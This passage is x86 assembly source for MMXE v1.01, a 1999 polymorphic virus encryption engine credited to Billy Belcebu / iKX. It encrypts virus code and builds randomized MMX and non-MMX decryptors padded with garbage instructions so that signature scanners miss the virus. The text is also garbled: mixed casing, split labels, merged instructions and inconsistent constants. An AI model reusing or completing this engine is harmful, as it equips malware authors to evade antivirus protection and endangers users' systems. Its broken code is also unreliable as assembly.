; ------------------- }
;
The generated code doesn't preted in Any Way to see Seem Realistic: Just The
ipposite. It generates a lot of nonsenses (Very Few Executables Use MMX OP-
.................
;
Input:
ECX = Size of code to encrypt
ESI = Pointer to the data to encrypt
EDI = BUFFER Where Put the Decryptor
EBP = DELTA OFFSET
Output:
ECX = Decryptor Size
;
All the other registers, preserved.
;
[Default MMXE settings]
Limit EQU 800H; Decryptor Size (2K)
Recursion EQU 05H; The Recursion Level of THME
NGARBAGE EQU 08H; Sorta Level of Garbage
[Registers]
_Eax EQU 00000000B; All these Are Are The Numeric
_Ecx EQU 00000001b; Value of All the registers.
_EDX EQU 00000010b; Heh, I Haven't Used Here
_Ebx equ 00000011b; All this, but ... WTF? They
_ESP EQU 00000100B; Don't waste Bytes, And MA-
_EBP EQU 00000101b; Ke this shit to be more
_Esi Equ 00000110b; Clear :)
_EDI EQU 00000111B;
[Mmx registers]
_MM0 EQU 00000000B
_MM1 EQU 00000001B
_MM2 EQU 00000010B
_MM3 EQU 00000011B
_MM4 EQU 00000100B
_MM5 EQU 00000101B
_MM6 EQU 00000110B
_MM7 EQU 00000111B
[INTERNAL FLAGS]
_Check4MMX EQU 00000000000000001B
_Deltaoffset EQU 0000000000000010B
_LoadSize Equ 0000000000000100B
_LoadPointer EQU 0000000000001000B
_LoadKey EQU 0000000000010000B
_Passkey2mmx EQU 0000000000100000B
_Passptr2mmx EQU 0000000001000000B
_Crypt EQU 000000000010000000B
_Passmmx2ptr EQU 0000000100000000B
_Incpointer EQU 0000000000000000000B
_Deccounter EQU 0000010000000000B
_LOOP EQU 0000100000000000B
[Positions]
@ CHECK4MMX EQU 00H
@Deltaoffset EQU 01H
@Loadsize EQU 02H
@Loadpointer EQU 03H
@LoadKey EQU 04H
@ Passkey2mmx EQU 05H
@ Passptr2mmx EQU 06H
@Crypt EQU 07h
@ Passmmx2Ptr Equ 08h
@Incpointer EQU 09H
@Deccounter EQU 0AH
@Loop EQU 0BH
[Pushad structure]
Pushad_edi Equ 00H
Pushad_esi EQU 04H
Pushad_EBP EQU 08H
Pushad_esp EQU 0ch
Pushad_ebx EQU 10h
Pushad_edx EQU 14H
Pushad_ecx EQU 18h
Pushhad_eax EQU 1ch
RETURN_ADDRESS EQU 04H
[Mmxe v1.01]
MMXE Proc
Pushhad
Call @@ init_mmxe
Pushhad
Call @@ Crypt_Data
Popad
Call @@ gen_some_garbage
Call @@ Gen_Check4mmx
Call @@ gen_some_garbage
Generate The 5 Parts of The Decryptor That Go Before The Loop
@@gb4l_:
Call @@ gen_some_garbage
Call @@ gen_before_loop
@@gb4l ?::
Movzx ECX, Word PTR [EBP @@ flags]
XOR ECX, _CHECK4MMX OR /; Check if All Flags WERE
_Deltaoffset or /; done ... (They Should Be,
_LoadSize or /; But I don't trust in my OWN
_LoadPointer or /; Code :)
_LoadKey OR /
_Passkey2mmx
JNZ @@gb4l_
Get the loop point
Call @@ getloopaddress
Call @@ gen_some_garbage
Generate The Decryptor Instructions That Form The loop
Lea ESI, [EBP @@After_loopTBL]
Mov ECX, @@ s_aftlooptbl
@@gal: lodsd
Add Eax, EBP
PUSH ECX ESI
Call EAX
Call @@ gen_some_garbage
POP ESI ECX
Loop @@gal
Mov al, 0e9h
Stosb
Mov Eax, Limit
MOV EBX, EDI
SUB EBX, DWORD PTR [EBP @@ ptr_buffer]
Add ebx, 4
Sub Eax, EBX
Stosd
And now generate the Non-MMX Decryptor
Call @@ gen_garbage
MOV EAX, DWORD PTR [EBP @@ ptrto2nd] MOV EBX, EDI
SUB EBX, EAX
SUB EBX, 4
Mov DWORD PTR [EAX], EBX
And Word PTR [EBP @@ Flags], 0000H
AND BYTE PTR [EBP @@ @@ it_mmx?], 00H
Or Word PTR [EBP @@ flags], _ Check4mmx
@@gb4lx_:
Call @@ gen_some_garbage
Call @@ gen_before_loop_non_mmm
@@gb4lx ?:
Movzx ECX, Word PTR [EBP @@ flags]
XOR ECX, _CHECK4MMX OR /; Check if All Flags WERE
_Deltaoffset or /; done ... (They Should Be,
_LoadSize or /; But I don't trust in my OWN
_LoadPointer or /; Code :)
_LoadKey
JZ @@ Continue_with_this
Movzx ECX, Word PTR [EBP @@ flags]
XOR ECX, _CHECK4MMX OR /; in Strange Files, I Dunno
_Deltaoffset or /; why, instead 1f, we must
_LoadSize or /; check for 3f ... Otherwise,
_LoadPointer or /; all it goes to hell :(
_LoadKey OR /
_Passkey2mmx
JNZ @@gb4lx_
@@ Continue_With_THIS:
Call @@ gen_garbage
Call @@ getloopaddress
Lea ESI, [EBP @@After_l00ptbl]
Mov ECX, @@ s_afTL00PTBL
@@galx: lodsd
Add Eax, EBP
PUSH ECX ESI
Call EAX
Call @@ gen_some_garbage
POP ESI ECX
Loop @@galx
Mov al, 0e9h; generate the jmp
Stosb; Decrypted Virus Code
Mov Eax, Limit
MOV EBX, EDI
SUB EBX, DWORD PTR [EBP @@ ptr_buffer]
Add ebx, 04h
Sub Eax, EBX
Stosd
XCHG Eax, Ecx; Fill with Shit The Rest
@@ FillTherest:
Call Random
Stosb
Loop @@ filltherest
Call @@ uninit_mmxe
Popad
RET
DB 00H, "[mmxe v1.01]", 00h
; --- Initialization & Uninitialization Routines
@@ init_mmxe:
MOV DWORD PTR [EBP @@ ptr_data2enc], ESI
MOV DWORD PTR [EBP @@ ptr_buffer], EDI
MOV DWORD PTR [EBP @@ size2enc], ECX
SHR ECX, 2
MOV DWORD PTR [EBP @@ size2cryptd4], ECX
AND BYTE PTR [EBP @@ @@ it_mmx?], 00H
And Word PTR [EBP @@ flags], 00H
Call Random
MOV DWORD PTR [EBP @@ enc_key], EAX
@@ Get_Key:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@ get_key
CMP Eax, _esp
JZ @@ get_key
MOV BYTE PTR [EBP @@reg_key], Al
MOV EBX, EAX
@@ get_ptr2data:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@ get_ptr2data
CMP Eax, _esp
JZ @@ get_ptr2data
CMP Eax, _ebp
JZ @@ get_ptr2data
CMP EAX, EBX
JZ @@ get_ptr2data
MOV BYTE PTR [EBP @@reg_ptr2data], al
MOV ECX, EAX
@@ get_counter:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@ get_counter
CMP Eax, _esp
JZ @@ get_counter
CMP EAX, EBX
JZ @@ get_counter
CMP EAX, ECX
JZ @@ get_counter
MOV BYTE PTR [EBP @@ reg_counter], Al
Mov Edx, EAX
@@ get_delta:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@ get_delta
CMP Eax, _esp
JZ @@ get_delta
CMP EAX, EBX
JZ @@ get_delta
CMP EAX, ECX
JZ @@ get_delta
CMP EAX, EDX
JZ @@ get_delta
MOV BYTE PTR [EBP @@ reg_delta], Al
Mov Edx, EAX
@@ get_mmxptr2data:
Mov Eax, 08h
Call R_Range
MOV BYTE PTR [EBP @@ mmx_ptr2data], Al
MOV EBX, EAX
@@ get_mmxkey:
Mov Eax, 08h
Call R_Range
CMP EAX, EBX
JZ @@ get_mmxkey
MOV BYTE PTR [EBP @@ mmx_key], al
MOV DWORD PTR [EDI], "exmm"
RET
@@ uninit_mmxe:
MOV ECX, EDI
SUB ECX, DWORD PTR [EBP @@ Ptr_Buffer]
MOV [ESP.RETURN_ADDRESS.PUSHAD_ECX], ECX
RET
; --- Who Made this? Ehrm ... Oh, IT WAS me! :)
DB 00H, "[- (c) 1999 Billy Belcebu / Ikx -]", 00H
; - Useful subroutines use by the engine
@@ get_register:
Movzx EBX, Byte Ptr [EBP @@ reg_key]
Movzx ECX, Byte Ptr [EBP @@reg_ptr2data]
Movzx EDX, Byte Ptr [EBP @@reg_counter]
Movzx ESI, BYTE PTR [EBP @@reg_delta]
@@ GR_GET_Another:
Mov Eax, 08h
Call R_Range
CMP Eax, _esp
JZ @@ gr_get_another
CMP EAX, EBX
JZ @@ gr_get_another
CMP EAX, ECX
JZ @@ gr_get_another
CMP EAX, EDX
JZ @@ gr_get_another
CMP EAX, ESI
JZ @@ gr_get_another
CMP Al, Byte PTR [EBP @@ reg_mask]
JZ @@ gr_get_another
RET
@@ get_mmx_register:
Movzx EBX, Byte Ptr [EBP @@ mmx_ptr2data]
Movzx ECX, Byte PTR [EBP @@ mmx_key]
@@gmmxr_get_another:
Mov Eax, 08h
Call R_Range
CMP EAX, EBX
JZ @@gmmxr_get_another
CMP EAX, ECX
JZ @@gmmxr_get_another
RET
@@ clean_mask:
AND BYTE PTR [EBP @@reg_mask], 00H
RET
@@ is_register:
CMP Al, Byte PTR [EBP @@reg_key]
JZ @@ is_used
CMP Al, Byte PTR [EBP @@reg_ptr2data]
JZ @@ is_used
CMP Al, Byte PTR [EBP @@reg_counter]
JZ @@ is_used
CMP Al, Byte PTR [EBP @@ reg_delta]
JZ @@ is_used
CMP Al, Byte PTR [EBP @@ reg_mask]
JZ @@ is_used
MOV CL, 00H
Org $ -1
@@ is_USED:
STC
RET
@@ gen_before_loop:
Mov Eax, 05h
Call R_Range
OR EAX, EAX; 0
JZ @@ try_deltaoffset
Dec Eax; 1
JZ @@ Try_loadsize
Dec Eax; 2
JZ @@ try_loadpointer
Dec Eax; 3
JZ @@ Try_loadkey; 4
JMP @@ TRY_PassKey2MMX; 5
@@ try_deltaoffset:
Bt Word PTR [EBP @@ flags], @ deltaoffsetjc @@ gen_before_loop
Call @@ gen_deltaoffset
RET
@@ Try_loadsize:
Bt Word PTR [EBP @@ flags], @ loadingsize
JC @@ gen_before_loop
Call @@ge_loadsize
RET
@@ try_loadpointer:
Bt Word PTR [EBP @@ flags], @ loadingpointer
JC @@ gen_before_loop
Bt Word PTR [EBP @@ flags], @ deltaoffset
JNC @@ gen_before_loop
Call @@ gen_loadpointer
RET
@@ Try_loadkey:
Bt Word PTR [EBP @@ flags], @ loadingKey
JC @@ gen_before_loop
Call @@ge_loadkey
RET
@@ try_passkey2mmx:
Bt Word PTR [EBP @@ flags], @ passkey2mmm
JC @@ gen_before_loop
Bt Word PTR [EBP @@ flags], @ loadingKey
JNC @@ gen_before_loop
Call @@ Gen_PassKey2mmx
RET
@@ gen_before_loop_non_mmx:
Mov Eax, 04h
Call R_Range
OR EAX, EAX; 0
JZ @@ try_deltaoffset_non_mmx
Dec Eax; 1
JZ @@ TRY_LOADSIZE_NON_MMX
Dec Eax; 2
JZ @@ TRY_LOADPOINTER_NON_MMX
JMP @@ TRY_LOADKEY_NON_MMX
@@ try_deltaoffset_non_mmx:
Bt Word PTR [EBP @@ flags], @ deltaoffset
JC @@ gen_before_loop
Call @@ gen_deltaoffset
RET
@@ Try_loadsize_non_mmx:
Bt Word PTR [EBP @@ flags], @ loadingsize
JC @@ gen_before_loop
Call @@ge_loadsize
RET
@@ try_loadpointer_non_mmx:
Bt Word PTR [EBP @@ flags], @ loadingpointer
JC @@ gen_before_loop
Bt Word PTR [EBP @@ flags], @ deltaoffset
JNC @@ gen_before_loop
Call @@ gen_loadpointer
RET
@@ Try_loadKey_non_mmx:
Bt Word PTR [EBP @@ flags], @ loadingkeyjc @@ gen_before_loop
Call @@ge_loadkey
RET
@@ Crypt_Data:
MOV ECX, DWORD PTR [EBP @@ size2cryptd4]
MOV EBX, DWORD PTR [EBP @@ enc_key]
MOV EDI, DWORD PTR [EBP @@ ptr_data2enc]
MOV ESI, EDI
@@ CL00P: LODSD
XOR EAX, EBX
Stosd
Loop @@ CL00P
RET
; --- Garbage Generators
@@ gen_garbage:
Inc Byte PTR [EBP @@ recursion]
CMP BYTE PTR [EBP @@ recursion], Recursion
Jae @@gg_exit
CMP BYTE PTR [EBP @@ @@ it_mmx?], 00H
Ja @@gg_mmx
@@gg_non_mmmx:
MOV EAX, @@ non_mmx_gbg
JMP @@gg_doot
@@gg_mmx:
Mov Eax, @@ s_gbgtbl
@@gg_doot:
Call R_Range
Lea EBX, [EBP @@ GBGTBL]
MOV EAX, [EBX EAX * 4]
Add Eax, EBP
Call EAX
@@gg_exit:
Dec byte PTR [EBP @@ recursion]
RET
@@ gen_some_garbage:
Mov ECX, NGARBAGE
@@gsg_l00p:
Push ECX
Call @@ gen_garbage
POP ECX
Loop @@gsg_l00p
RET
Generates Any Arithmetic Operation with a register with another one register:
Add / OR / ADC / SBB / AND / SUB / XOR / CMP REG32, REG32
@@ gen_arithmetic_reg32_reg32:
Call Random
And Al, 00111000B; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]
OR Al, 00000011B
Stosb
@@gar32r32:
Call @@ get_register
OR Al, Al
JZ @@gar32r32
SHL EAX, 3
OR Al, 11000000B
Push EAX
Call Random
And Al, 00000111B
XCHG EBX, EAX
POP EAX
OR Al, BL
Stosb
RET
Generates Any Arithmetic Operation with An Immediate With a 32bit Register:
Add / OR / ADC / SBB / AND / SUB / XOR / CMP REG32, IMM32
@@ gen_arithmetic_reg32_imm32:
MOV Al, 81H; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]
Stosb
@@ Gar32i32: Call @@ get_register
OR Al, Al
JZ @@gar32i32
Push EAX
Call Random
And Al, 00111000B
OR Al, 11000000B
POP EBX
OR Al, BL
Stosb
Call Random
Stosd
RET
Generates Any Arithmetic Operation with An Immediate With Eax:
; Add / OR / ADC / SBB / AND / SUB / XOR / CMP EAX, IMM32
@@ gen_arithmetic_eax_imm32:
Call Random
And Al, 00111000B; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]
OR Al, 00000101B
Stosb
Call Random
Stosd
RET
Generates a MOV IMMEDIATE TO 32 BIT REG:
Mov reg32, IMM32
@@ gen_mov_reg32_imm32:
Call @@ get_register
Add Al, 0B8H
Stosb
Call Random
Stosd
RET
Generates MOV IMMEDIATE TO 8bit REG:
Mov reg8, IMM8
@@ gen_mov_reg8_imm8:
Mov Eax, 4
Call R_Range
Call @@ is_register
JC @@ Quitthisshit
Push EAX
MOV Eax, 2
Call R_Range
POP ECX
XCHG EAX, ECX
Jecxz @@ use_msb
@@ put_it:
Add Al, 0B0H
Stosb
Call Random
Stosb
@@ quitthisshit:
RET
@@ USE_MSB:
OR Al, 00000100B
JMP @@ PUT_IT
Generates Calls to Subroutines:
; Call @@ 1
[...]
; JMP @@ 2
[...]
; @@1: [...]
RET
[...]
; @@2: [...]
@@ gen_call_to_subroutine:
Mov al, 0e8h
Stosb
XOR EAX, EAX
Stosd
Push EDI
Call @@ gen_garbage
Mov al, 0e9h
Stosb
XOR EAX, EAX
Stosd
Push EDI
Call @@ gen_garbage
MOV Al, 0C3H
Stosb
Call @@ gen_garbage
MOV EBX, EDI
POP EDX
SUB EBX, EDX
MOV [EDX-4], EBX
POP ECX
Sub EDX, ECX
MOV [ECX-4], EDX
@@ DO_Anything:
RET
Generate Push / Garbage / Pop Structure (Allows Recursivity):
Push REG
[...]
Pop REG
;
@@ gen_push_garbage_pop:
Mov Eax, 08h
Call R_Range
Add Al, 50h
Stosb
Call @@ gen_garbage
Call @@ get_registeradd Al, 58H
Stosb
RET
MMX Group 1:
;
PUNPCKLBW / PUNPCKLWD / PUNPCKLDQ / PACKSSWB / PCMPGTB / PCMPGTW / PCMPGTD / PACHUSWB
Punpckhbw / PUNPCKHWD / PUNPCKHDQ / PACKSSDW
@@ gen_mmx_group1:
MOV BX, 600FH
MOV Eax, 0Ch
Call R_Range
Add Bh, Al
XCHG EAX, EBX
Stosw
Call @@ build_mmx_gbg_rib
RET
@@ GEN_MMX_MOVQ_MM? _MM ?:
MOV AX, 6F0FH; MOVQ MM?, MM?
Stosw
Call @@ build_mmx_gbg_rib
RET
@@ gen_mmx_movd_mm? _REG32:
MOV AX, 7E0FH; MOVD MM?, E??
Stosw
Call @@ get_mmx_register
SHL EAX, 3
Push EAX
Call @@ get_register
XCHG EAX, EBX
POP EAX
OR Al, BL
OR Al, 11000000B
Stosb
RET
MMX Group 2:
;
PCMPEQB / PCMPEQW / PCMPEQD
@@ gen_mmx_group2:
Mov Al, 0FH
Stosb
Mov Eax, 3
Call R_Range
Add Al, 74H
Stosb
Call @@ build_mmx_gbg_rib
RET
MMX Group 3:
;
PSRLW / PSRLD / PSRLQ / PMULLW / PSUBUBUSB / PSUBUSW / PAND / PADDUSB / PADDUSW / PANDN / PSRAW
; PSRAD / PMULHW / PSUBSB / PSUBSW / POR / PADDSB / PADDSW / PXOR / PSLLW / PSLLD / PSLLQ / PMULADDWD
@@ gen_mmx_group3:
Mov Al, 0FH
Stosb
Call @@ __ overshit
@@ eoeo: DB 0D1H, 0D2H, 0D3H, 0D5H, 0D8H, 0D9H, 0DBH, 0DCH, 0DDH, 0DFH
DB 0e1h, 0e2h, 0e5h, 0e8h, 0e9h, 0ebh, 0ech, 0edh, 0efh
DB 0F1H, 0F2H, 0F5H
SG3TBL EQU ($ -offset @@ eoeo)
@@ __ overshit:
POP ESI
MOV EAX, SG3TBL
Call R_Range
Mov Al, Byte PTR [ESI EAX]
Stosb
Call @@ build_mmx_gbg_rib
@@gmmx_goaavy:
RET
@@ build_mmx_gbg_rib:
Call @@ get_mmx_register
SHL EAX, 3
Push EAX
Call @@ get_mmx_register
XCHG EAX, EBX
POP EAX
OR EAX, EBX
OR Al, 11000000B
Stosb
RET
Generate OneByters:
;
; CLD / CMC / SALC / NOP / LAHF / INC EAX / DEC EAX / SAHF / (F) WAIT / CWDE
@@ Gen_onebyter:
Call @@ Go_OVERSHIT
DB 0fch, 0f5h, 0D6H, 90H, 9FH, 40H, 48H, 9EH, 9BH, 98H @@ Go_OVERSHIT:
POP ESI
Mov Eax, 0ah
Call R_Range
Mov Al, Byte PTR [ESI EAX]
Stosb
RET
Generate Many Possible Ways for Make a Determinated Register To BE 0:
XOR REG, REG / SUB REG, REG / PUSH 0 POP REG / AND Reg, 0 / MOV REG, 0
@@ gen_zer0_reg:
Call @@ get_register; for garbage generators
@@ gen_zero_reg:
Push EAX
Mov Eax, 06h
Call R_Range
POP ECX
XCHG EAX, ECX
Jecxz @@ xor_reg_reg
Dec ECX
Jecxz @@ sub_reg_reg
Dec ECX
JECXZ @@ push_0_pop_reg
Dec ECX
JECXZ @@ and_reg_0
Dec ECX
JECXZ @@ mov_reg_0
@@ or_reg_m1_inc_reg:
Push EAX
CMP Al, _eax
JNZ @@ or_reg_m1
@@ or_eax_m1:
MOV Al, 0dH; or Eax, -1
Stosb
XOR EAX, EAX
Dec EAX
Stosd
JMP @@ om1ir_inc_reg
@@ or_reg_m1:
XCHG EAX, EBX
MOV AX, 0C883H; Or REG, -1
OR AH, BL
Stosw
XOR EAX, EAX
Dec EAX
Stosb
XCHG EAX, EBX
@@ om1ir_inc_reg:
POP EAX
Add Al, 40h; Inc REG
Stosb
RET
@@ XOR_REG_REG:
XCHG EAX, EBX
MOV AX, 0C033H; XOR REG, REG
OR AH, BL
SHL EBX, 3
OR AH, BL
Stosw
RET
@@ sub_reg_reg:
XCHG EAX, EBX
MOV AX, 0C02BH; Sub Reg, REG
OR AH, BL
SHL EBX, 3
OR AH, BL
Stosw
RET
@@ Push_0_POP_REG:
Push EAX
MOV AX, 006AH; Push 00h
Stosw; POP REG
POP EAX
Add Al, 58h
Stosb
RET
@@ and_reg_0:
CMP Al, _eax
JNZ @@ and_regnoteax_0
@@ and_eax_0:
MOV Al, 25h
Stosb
XOR EAX, EAX
Stosd
RET
@@ and_regnoteax_0:
XCHG EAX, EBX
MOV AX, 0E083H; and reg, 00
OR AH, BL
Stosw
XOR EAX, EAX
Stosb
RET
@@ mov_reg_0:
Add Al, 0B8H; MOV REG, 00000000
Stosb
XOR EAX, EAX
Stosd
RET
; --- Decryptor Code Generators
Generate The Routine for Check for MMX Presence, That Should Perform Exactly; The Same Action of the Following Code:
MOV EAX, 1
; Cpuid
; BT EDX, 17h
JNC NOT_MMX
@@ Gen_Check4mmx:
Mov Eax, 08h
Call R_Range
XCHG EAX, ECX
JECXZ @@ c4mmx_a _ @@ 1
Dec ECX
Jecxz @@ c4mmx_a _ @@ 2
Dec ECX
Jecxz @@ c4mmx_a _@@ 3
Dec ECX
JECXZ @@ c4mmx_a _@@ 4
Dec ECX
JECXZ @@ c4mmx_a _@@ 5
Dec ECX
JECXZ @@ c4mmx_a _ @@ 6
Dec ECX
JECXZ @@ c4mmx_a _ @@ 7
@@ c4mmx_a _ @@ 8:
XOR Eax, Eax; Zero EAX
Call @@ gen_zero_reg; Sub Eax, -1
MOV Al, 2DH
Stosb
XOR EAX, EAX
Dec EAX
Stosd
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 7:
XOR Eax, Eax; Zero EAX
Call @@ gen_zero_reg; add eax, 1
MOV Al, 05H
Stosb
XOR EAX, EAX
INC EAX
Stosd
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 6:
XOR Eax, Eax; Zero EAX
Call @@ gen_zero_reg; STC
MOV AX, 1DF9H; SBB EAX, -2
Stosw
XOR EAX, EAX
Dec EAX
Dec EAX
Stosd
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 5:
XOR Eax, Eax; Zero EAX
Call @@ gen_zero_reg; STC
MOV AX, 15F9H; ADC EAX, 00000000
Stosw
XOR EAX, EAX
Stosd
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 4:
MOV Al, 0dH; or Eax, -1
Stosb; And Eax, 1
XOR EAX, EAX
Dec EAX
Stosd
MOV Al, 25h
Stosb
XOR EAX, EAX
INC EAX
Stosd
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 3:
Mov Eax, 9058016ah; Push 01
Stosd; POP EAX
Dec Edi
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 2:
XOR EAX, EAX
Call @@ gen_zero_reg; Zero EAX
MOV Al, 40h; Inc EAX
Stosb
JMP @@ C4mmx_Over_a
@@ c4mmx_a _ @@ 1:
MOV Al, 0B8H; MOV Eax, 1stosb
XOR EAX, EAX
INC EAX
Stosd
@@ c4mmx_over_a:
Call @@ gen_garbage
MOV AX, 0A20FH; CPUID
Stosw
Call @@ clean_mask
MOV BYTE PTR [EBP @@ reg_mask], _ edx
Call @@ gen_garbage
Mov Eax, 03h
Call R_Range
OR EAX, EAX
JZ @@ c4mmx_b _ @@ 3
Dec EAX
JZ @@ c4mmx_b _ @@ 2
@@ c4mmx_b _ @@ 1:
MOV EAX, 17E2BA0FH; BT EDX, 17h
Stosd; JC $ ??
MOV Al, 72H
Stosb
JMP @@ c4mmx_over_b
@@ c4mmx_b _ @@ 2:
MOV EAX, 0000C2F7H; Test EDX, 00400000H
Stosd; jz $ ??
Mov Eax, 00740040h
Stosd
Dec Edi
JMP @@ c4mmx_over_b
@@ c4mmx_b _ @@ 3:
MOV Eax, 7218EAC1H; SHR EDX, 18H
Stosd; JC $ ??
@@ c4mmx_over_b:
Push EDI
INC EDI; FAKE DATA for Temp. Fail
Call @@ gen_garbage
MOV Al, 0e9h; RET
Stosb
MOV DWORD PTR [EBP @@ ptrto2nd], EDI
XOR EAX, EAX
Stosd
Call @@ gen_garbage
POP EBX
Mov Edx, EDI
Sub EDX, EBX
Dec edx
MOV BYTE PTR [EBX], DL
Inc Byte PTR [EBP @@ init_mmx?]
Or Word PTR [EBP @@ flags], _ Check4mmx
RET
Generate a Routine for get the pseudo delta-offset, Which Will Look Like
"this one:
; Call @@ 1
[...]
; @@ 1: POP REG
@@ gen_deltaoffset:
Mov Eax, 10h
Call R_Range
XCHG EAX, EBX
Mov al, 0e8h
Stosb
XOR EAX, EAX
Stosd
MOV DWORD PTR [EBP @@ Tmp_Call], EDI
Call @@ gen_garbage
MOV ECX, DWORD PTR [EBP @@Tmp_call]
MOV EBX, EDI
SUB EBX, ECX
MOV [ECX-4], EBX
MOV Al, 58H
Add Al, Byte PTR [EBP @@reg_delta]
Stosb
MOV EBX, DWORD PTR [EBP @@ ptr_buffer]
SUB ECX, EBX
MOV DWORD PTR [EBP @@ fix1], ECX
Or Word PTR [EBP @@ flags], _ Deltaoffsetret
Generate a Routine for Put in the register buy as counter the size of the
Code We want to decrypt
@@ gen_loadsize:
Or Word PTR [EBP @@ flags], _ loadingSize
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@ GLS _ @@ 2
@@ GLS _ @@ 1:
MOV Al, 68H; Push Size
Stosb; Pop Reg_Size
MOV DWORD PTR [EBP @@ size_address], EDI
MOV EAX, DWORD PTR [EBP @@ size2cryptd4]
Stosd
Call @@ gen_garbage
MOV Al, 58H
Add Al, Byte PTR [EBP @@reg_counter]
Stosb
RET
@@ GLS _ @@ 2:
Movzx Eax, Byte Ptr [EBP @@reg_counter]
Add Eax, 0B8H; Mov Reg_Size, SIZE
Stosb
MOV DWORD PTR [EBP @@ size_address], EDI
MOV EAX, DWORD PTR [EBP @@ size2cryptd4]
Stosd
RET
Generate The Code That Will Make The Pointer Register To Point Exactly To
The beginning of the code we want to encrypt or Decrypt
@@ gen_loadpointer:
Mov Eax, Limit
Sub Eax, DWORD PTR [EBP @@ fix1]
MOV DWORD PTR [EBP @@ fix2], EAX
Mov Eax, 03h
Call R_Range
OR EAX, EAX
JZ @@ lp _ @@ 3
Dec EAX
JZ @@ lp _ @@ 2
@@ lp _ @@ 1:
MOV Al, 8DH; Lea REG_PTR, [REG_DELTA FIX]
Stosb
Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]
SHL Al, 3
Add Al, 10000000B
Add Al, Byte PTR [EBP @@reg_delta]
Stosb
JMP @@ lp_
@@ lp _ @@ 2:
MOV Al, 8bh; Mov Reg_ptr, Reg_Delta
Stosb; add reg_ptr, fix
Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]
SHL EAX, 3
OR Al, Byte PTR [EBP @@reg_delta]
OR Al, 11000000B
Stosb
Call @@ gen_garbage
MOV Al, 81H
Stosb
MOV Al, 0C0H
OR Al, Byte PTR [EBP @@reg_ptr2data] stosb
JMP @@ lp_
@@ lp _ @@ 3:
Call @@ clean_mask; mov reg_mask, fix2
Call @@ get_register; lea reg_ptr, [REG_MASK REG_DELTA (FIX FIX2)]
MOV BYTE PTR [EBP @@ reg_mask], Al
Add Al, 0B8H
Stosb
Call Random
Stosd
Push EAX
Call @@ gen_garbage
POP EDX
Sub DWORD PTR [EBP @@ fix2], EDX
MOV Al, 8DH
Stosb
Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]
SHL EAX, 3
OR Al, 10000100B
Stosb
Movzx Eax, Byte Ptr [EBP @@ reg_mask]
SHL EAX, 3
OR Al, Byte PTR [EBP @@reg_delta]
Stosb
@@ lp_:
MOV EAX, DWORD PTR [EBP @@ fix2]
Stosd
Or Word PTR [EBP @@ flags], _ loadpointer
RET
Put in the register buy as key the number buy for the encryption of the
Virus Code.
@@ gen_loadkey:
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@ GLK _ @@ 2
@@ GLK _ @@ 1:
MOV Al, 68H; Push Enc_Key
Stosb; Pop Reg_Key
MOV EAX, DWORD PTR [EBP @@ enc_key]
Stosd
Call @@ gen_garbage
MOV Al, 58H
Add Al, Byte PTR [EBP @@reg_key]
Stosb
Or Word PTR [EBP @@ flags], _ loadingKey
RET
@@ GLK _ @@ 2:; Mov key_reg, enc_key
Movzx Eax, Byte Ptr [EBP @@ reg_key]
Add Eax, 0B8H
Stosb
MOV EAX, DWORD PTR [EBP @@ enc_key]
Stosd
Or Word PTR [EBP @@ flags], _ loadingKey
RET
Generate The Code forpass the Encryption Key to an MMX Register
@@ gen_passkey2mmx:
MOV AX, 6E0FH; MOV MMX_Key, Reg_Key
Stosw
Movzx Eax, Byte Ptr [EBP @@ mmx_key]
SHL EAX, 3
OR Al, Byte PTR [EBP @@reg_key]
OR Al, 11000000B
Stosb
Or Word PTR [EBP @@ Flags], _ passkey2mmxret
; Just for Know Where We Must loop The Decryptor
@@ getLoopAddress:
MOV DWORD PTR [EBP @@ l00paddress], EDI
RET
Pass the dword of code we are decrypting to the mmx register buy for what
Matter
@@ gen_passptr2mmx:
MOV AX, 6E0FH; MOV MMX_PTR, [REG_PTR]
Stosw
Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]
SHL EAX, 3
OR Al, Byte PTR [EBP @@ reg_ptr2data]
Stosb
Or Word PTR [EBP @@ flags], _ Passptr2mmx
RET
Generate The MMX Encryption Opcode:
PXOR
@@ gen_crypt_instructions:
MOV AX, 0EF0FH; PXOR MMX_PTR, MMX_Key
Stosw
Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]
SHL EAX, 3
OR Al, Byte PTR [EBP @@ mmx_key]
OR Al, 11000000B
Stosb
Or Word PTR [EBP @@ flags], _ Crypt
RET
Generate The Alternative Method of MMX Encryption Code:
; Pxor = xor
@@ gen_non_mmx_crypt_instructions:
MOV AX, 0031H; XOR [REG_PTR], REG_KEY
Movzx EBX, Byte Ptr [EBP @@ reg_key]
SHL EBX, 3
OR BL, BYTE PTR [EBP @@ reg_ptr2data]
OR AH, BL
Stosw
RET
Generate The Code That Will Pass The Already Decrypted Data To ITs Original
Position
@@ gen_passmmx2ptr:
MOV AX, 7E0FH; MOVD [REG_PTR], (MMX_PTR XOR MMX_KEY)
Stosw
Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]
SHL EAX, 3
OR Al, Byte PTR [EBP @@ reg_ptr2data]
Stosb
Or Word PTR [EBP @@ flags], _ Passmmx2Ptr
RET
Select the Order Between Increase Pointer and Decrease Counter
@@ gen_incpointer_deccounter:
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@gdc_gip
@@ gip_gdc:
Call @@ge_incpointer
Call @@ gen_some_garbage
Call @@ gen_deccounterret
@@gdc_gip:
Call @@ gen_deccounter
Call @@ gen_some_garbage
Call @@ge_incpointer
RET
Generate The Code for Make The Pointer Register To Point To The Next Dword
